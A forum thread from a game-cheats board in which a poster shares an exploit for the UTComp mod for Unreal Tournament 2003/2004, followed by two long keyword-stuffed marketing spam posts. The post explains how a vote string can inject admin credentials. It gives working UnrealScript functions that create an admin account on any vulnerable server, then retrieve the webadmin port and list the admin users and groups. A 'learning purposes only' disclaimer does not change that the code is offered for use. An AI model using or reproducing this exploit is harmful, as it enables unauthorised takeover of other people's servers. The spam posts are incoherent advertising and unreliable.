Unreal Tournament 2003/2004 > Cheats
UTComp Admin Hack.
xdemic:
A few months ago I found a exploit in the UTComp mod that allowed players to hack into the admin / webadmin of any UTComp server with UTComp voting enabled.
It works by lack of an actual "is really an admin" check on a function that is meant to allow administrators too pass any vote, any client can successfully call this function in code.
You execute a map vote, but behind the map name you can input options create an admin account like so: DM-Rankin?AdminName=MyName?AdminPassword=MyPass, the map will change and you should now be able to login using your new account, from there you can use the commands I've included to get access to webadmin groups and listenport.
Unfortunately I told some people it was UTComp related, who then told others and soon enough the information was public knowledge and Wormbo created a post to inform the community, causing everyone to remove UTComp or Disable Voting.
Now that this is public news I'm sharing this code snippet:
--- Code: ---//====================================
// UTComp Admin Hack
// by xdemic
//====================================
//Add an admin account !
exec function AddUser( string User, string Pass )
{
local string Jack3r;
Jack3r = xPC.GetURLMap(FALSE) $ "?AdminName=" $User $"?AdminPassword=" $Pass;
UTCompPass(7, 0, Jack3r);
xPC.ClientMessage("Admin account created! User:"@User@"Pass:"@Pass);
}
exec function GetWebAdminURL()
{
local string a,b;
if ( xPC.PlayerReplicationInfo.bAdmin )
{
a = Left( xPC.GetServerNetworkAddress(), inStr(xPC.GetServerNetworkAddress(), ":") );
xPC.ConsoleCommand("Admin GET UWeb.WebServer ListenPort");
b = a $ ":" ;
xPC.CopyToClipboard( b );
xPC.ClientMessage("IP Data copied to clipboard !");
xPC.ClientMessage("Web Admin listenport:");
}
else
{
xPC.ClientMessage("you need administrator access !");
}
}
exec function GetAdminGroups()
{
if ( xPC.PlayerReplicationInfo.bAdmin )
{
LOG(xPC.ConsoleCommand("Admin GET XAdmin.xAdminConfigIni AdminUsers"));
LOG(xPC.ConsoleCommand("Admin GET XAdmin.xAdminConfigIni AdminGroups"));
}
else
{
xPC.ClientMessage("you need administrator access !");
}
}
//Pass any vote like an admin
exec function UTCompPass(byte VoteType, byte Switch, optional String Options, optional String Caller, optional Byte P2, optional String Options2)
{
local UTComp_PRI UPRI;
UPRI = GetUTCompPRI(xPC.PlayerReplicationInfo);
UPRI.PassVote(VoteType,Switch,Options,Caller,P2,Options2);
}
function UTComp_PRI GetUTCompPRI(PlayerReplicationInfo PRI)
{
local LinkedReplicationInfo lPRI;
if ( PRI.CustomReplicationInfo == None )
{
return None;
}
if ( UTComp_PRI(PRI.CustomReplicationInfo) != None )
{
return UTComp_PRI(PRI.CustomReplicationInfo);
}
for ( lPRI = PRI.CustomReplicationInfo.NextReplicationInfo; lPRI != None; lPRI = lPRI.NextReplicationInfo )
{
if ( UTComp_PRI(lPRI) != None )
{
return UTComp_PRI(lPRI);
}
}
return None;
}
--- End code ---
Remember you need to depend on UTComp in the editpackages list when you compile!
I'm not responsible for any damages caused by use of this exploit, I'm sharing for learning purposes only.
Xecutioner:
Nice, some unique content up in this bitch!
xdemic:
--- Quote from: Xecutioner on June 08, 2012, 08:19:11 PM ---Nice, some unique content up in this bitch!
--- End quote ---
:D
FrankJScott:
In response to the man inquiring about local seo marketing company, graphic design services, capital consulting, print media advertising agency, elephant ad agency, zimmerman advertising locations, I highly suggest this new marketing agency url or top network marketing companies, advertising agencyadvertising agency, mekanism ad agency, world of advertising agencies, franchise web design, health care web design, as well as this excellent marketing agency tips and don't forget explainer video production services, supply chain consulting companies, direct marketing solutions, best seo company, pricing hubspot, ma consulting, alongside all this high rated marketing agency forum which is also great. Also, have a look at this awesome online service link alongside all top marketing companies, onesource consulting, growth marketing consultants, biggest media agencies in the world, liberty mutual advertising agency, digital marketing website, not to mention this high rated online service advice not to mention goco consulting, full service ad agency, quantum marketing, ad agency services, advertising agency definition, top network marketing companies 2020, on top of excellent web service tips which is also worth a look. I also suggest this great marketing agency advice as well as major advertising companies, bda advertisement, top 10 advertising companies, big 4 advertising agencies, advertising agency management, corporate video production services, alongside all this awesome online service url alongside all organic ad agency, graphic design services online, digital marketing expert, facebook ad agency pricing, what is brand positioning, ad agency near me, not to mention recommended web service link as well as top 100 network marketing companies, human resources consulting, marketing advertising design, advertising video production company, best amazon advertising agencies, amazon advertising management, which is also great. Finally, have a look at this top rated marketing agency info with forrester consulting, digital advertising companies near me, advertising agency ads, content creation video, content marketing specialists, local seo services, for good measure. Check more @ New Online Marketing Site 1259cbd
FrankJScott:
In reply to the guy asking about gardena automatic hose reel, dandelion puller, makita hedge, giraffe tools garden hose reel, commercial hedge trimmer, warrior hedge trimmer, makita 40v hedge trimmer, fork garden tool, amazon water hose, tap hose connector argos, garden hose extender, I highly suggest this my response for uk garden tool advice on top of worx 56v hedge trimmer, best battery string trimmer 2021, spear and jackson lawnmower b&q, lightweight hose pipe, best garden trowel, stihl hse electric hedge trimmer, best heavy duty strimmer, garden tool kit, bush trimmer electric, topiary shears, hawksmoor cordless hedge trimmer, garden sieve the range, fiskars pruners, garden hose bib, tool used to remove weeds, look at this check this out about uk garden tool url as well as 3 prong cultivator, short hedge trimmer, garden spade, best garden vacuum, kärcher hge 18v 500mm cordless hedge trimmer, bush hedger, cool gardening tools, battery operated lawn edger, brush cutter argos, shindaiwa ah230s, jcb hedge trimmer, black and decker cordless leaf blower, kitchen hose connector, spear & jackson hedge trimmer, quality garden hose, try this my response on uk garden tool forum for hose pipe extension, lawn mower blades b&q, heavy duty hose reel, double ended hose connector, lidl parkside hedge trimmer battery, expanding hose pipe argos, fisker garden tools, stihl hs 87, wheelbarrow wagon, spear and jackson hedge trimmer, b&q hose reel, . See More Best Facts For Choosing A Toto Site b306212
Navigation
[0] Message Index
[#] Next page
Go to full version